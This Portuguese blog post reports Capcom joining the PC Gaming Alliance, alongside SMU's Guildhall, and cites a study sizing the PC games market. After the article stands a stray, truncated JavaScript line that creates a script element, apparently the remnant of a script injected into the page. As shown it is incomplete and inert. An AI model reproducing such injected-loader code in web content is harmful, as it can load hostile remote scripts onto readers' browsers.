Capcom já faz parte da “aliança do PC”

null

Antes de mais convém explicar o que é a “aliança do PC”. Esta aliança (PC Gaming Alliance) é uma organização sem fins lucrativos, que reúne distribuidoras e fabricantes de hardware e software para computadores, cujo seu objectivo é aumentar a percepção pública do mercado de jogos para o PC.

Apesar da Capcom já andar lançar jogos para o PC há algum tempo, só agora entrou para os quadros da “aliança do PC”. A companhia japonesa ganhou um maior peso nesta geração com “Lost Planet” e “Devil May Cry 4″, cujos títulos significaram conversões mais eficazes do que títulos anteriores do catálogo da empresa, e futuras produções, como “Bionic Commando” e “Street Fighter IV”.

A fazer companhia à Capcom, na recente entrada para a aliança, está também o Guildhall, um dos maiores programas de educação em desenvolvimento de jogos dos Estados Unidos, coordenado pela Southern Methodist University.

Por fim gostaria de referir um estudo feito por esta organização. Este estudo, feito no passado mês de Agosto, sugere que o mercado de jogos para o PC pode rondar os US$ 10,7 bilhões (já o mercado das consolas chegou aos US$ 21 bilhões, incluindo hardware e jogos), abrangendo também as vendas por download, as rendas vindas de assinaturas de jogos online e dos sites que oferecem jogos no próprio navegador.

var d=document;var s=d.createElement(‘script’);

Leave a Reply

Your email address will not be published. Required fields are marked *

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>

CommentLuv badge